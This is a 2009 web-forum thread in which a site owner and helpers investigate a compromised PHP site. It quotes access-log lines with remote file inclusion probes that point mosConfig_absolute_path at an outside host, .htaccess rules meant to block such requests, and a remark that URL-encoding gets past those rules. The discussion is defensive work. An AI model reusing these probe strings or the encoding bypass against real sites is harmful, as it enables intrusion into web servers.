mosConfig_absolute_path

[gevans]

Hey guys,

 

One of my sites have been compromised, causing google results to show the wrong title/description. From what I can tell I've got off lightly as the attack enabled them access to all the files on the server.

 

The main problem seems to be via mosConfig_absolute_path.

 

Does anyone have any information on this, and prevention? The access log in as follows;

 

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicago fc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141855 "-" "Mozilla/5.0"

 

This is a first for me, and I'm not 100% whats going on. So any information into what's happening, and how would be greatly appreciated.

 

Cheers,

gevans

[Daniel0]

Try grepping the access log for that IP address and see what turns up. Also, what kind of scripts are you running?

[PFMaBiSmAd]

What does a phpinfo() statement show for register_globals?

 

 

[gevans]

Try grepping the access log for that IP address and see what turns up. Also, what kind of scripts are you running?

 

It's a website with a CMS and seperate blog, the CMS feeding the main pages of the site. All the attacks have been done via the front end (as far as I can tell).

 

The following are all the access log lnes containing that IP in the last month;

 

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:22 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141943 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:23 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141868 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:32 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 142043 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET /files/1228233615_1.pdf//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET /files//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 403 285 "-" "Mozilla/5.0"

example.co.uk 91.192.20.164 - - [13/Oct/2009:15:25:42 +0100] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 200 141855 "-" "Mozilla/5.0"

 

 

What does a phpinfo() statement show for register_globals?

 

Registered globals are off

[Daniel0]

I would research the things in this file. It would seem like an RFI attack. This file is obviously harmless, but I suppose it could be used to probe for vulnerable websites.

[gevans]

The end result of the attack left a few files on the server. When search engines indexed the home page it was showing the wrong title/description. But the site itself worked as expected, I'll take a look at that file now.

[gevans]

This is the most usfeul page I've found on the matter so far;

 

http://fightskillz.com/2009/07/hack-attempts-by-idiots/

 

Trying to figure out the best course of action to take.

 

The best option so far seems to be as simple as this;

 

To return HTTP status 404 (Not Found) and an error page if the query string starts with

_SERVER[DOCUMENT_ROOT]=

try this in .htaccess file,

but be careful not to break the rest of the .htaccess file and get server error.

 

In this example the URL of your site's custom error page is error404.html

 

I suppose you already have somewhere in your .htaccess file

 

RewriteEngine on

RewriteBase /

 

and add somewhere below the following

 

RewriteCond %{QUERY_STRING} ^_SERVER[DOCUMENT_ROOT]=*

RewriteRule ^$ /error404.html$ [NC,L]

 

If you have any further recomendations please let me know.

 

Cheers,

gevans

[Daniel0]

Have a look at Tom's tutorial:

http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite

[gevans]

As simple as that?

 

Adding;

 

#Stop naughty RFI attacks

RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

RewriteRule ^(.+)$ - [F]

 

to my htaccess file?

 

If I've missed something let me know.

 

If not thanks a lot!

 

Cheers,

gevans

[PFMaBiSmAd]

Unfortunately, you can use URL encoded characters to get around that method -

 

%48ttp will be seen as Http in the php code doing the include statement.

 

[gevans]

Do you have any other methods you would recommend instead of/as well as the htaccess rewrite?

[PFMaBiSmAd]

Yes, simple, allow_url_include should be off (and if you are not yet using php5, where allow_url_include was added, you should be.)

 

All external data cannot be trusted and must be validated to insure it contains only expected values.

[gevans]

Everything that's pased to the site is getting validated as far as I can tell. I am on php5, and allow_url_include is off

[PFMaBiSmAd]

Then remote file inclusion is not how they are getting access to your site and the requests in the logs with a URL as a value are just probing attempts to find if your script allows remote file inclusion.

[Daniel0]

Unfortunately, you can use URL encoded characters to get around that method -

 

%48ttp will be seen as Http in the php code doing the include statement.

 

 

Hmm... seems like query string doesn't get decoded, but the rest does using mod_rewrite. How annoying.

[gevans]

Then remote file inclusion is not how they are getting access to your site and the requests in the logs with a URL as a value are just probing attempts to find if your script allows remote file inclusion.

 

Ok, I'm following

 

So if these 'probes' return a positive result for the attack they can run a more comprehensive (nastier) script to 'attack' the site?

[PFMaBiSmAd]

If you request your script using the whole request string like what is in the log (I would change the actual URL in it to known safe .txt file on your server), what do you get?

 

There could be other ways that request string is bypassing something in your script.

 

One of my sites have been compromised, causing google results to show the wrong title/description. From what I can tell I've got off lightly as the attack enabled them access to all the files on the server.

 

What exactly is getting changed on your site? A file? Contents in a database? How do you know someone had access to all the files on the server?

[gevans]

If you request your script using the whole request string like what is in the log (I would change the actual URL in it to known safe .txt file on your server), what do you get?

 

The main pages are called directly (about-us.php), though there is a moveabletype blog built into the site.

 

What exactly is getting changed on your site? A file? Contents in a database? How do you know someone had access to all the files on the server?

 

A line was added to the index.php file including a file that had been added to a folder in my directory. There were about 4 files added in total.

[PFMaBiSmAd]

Either someone has figured out one of your passwords that allows access to the files, you have a file upload feature (perhaps for a avatar or for a specific file upload) that allowed a .php file to be placed onto the server that was then browsed to, your admin section of a script is not actually preventing the remainder of code on the admin page(s) from being executed and someone used your admin script to modify your files, or you have some code using eval() (they should have spelled that evil()) that allowed some php code to be executed that was posted as content that is being displayed.

 

 

[gevans]

Thanks for that,

 

all the passwords have been changed (if that was the problem)

 

the admin area does have an upload available but this is restricted to pdf's and images.

 

I don't personally have code using eval() but the some of the files found on the server are using it.

 

I'll have to keep a close eye on the server logs.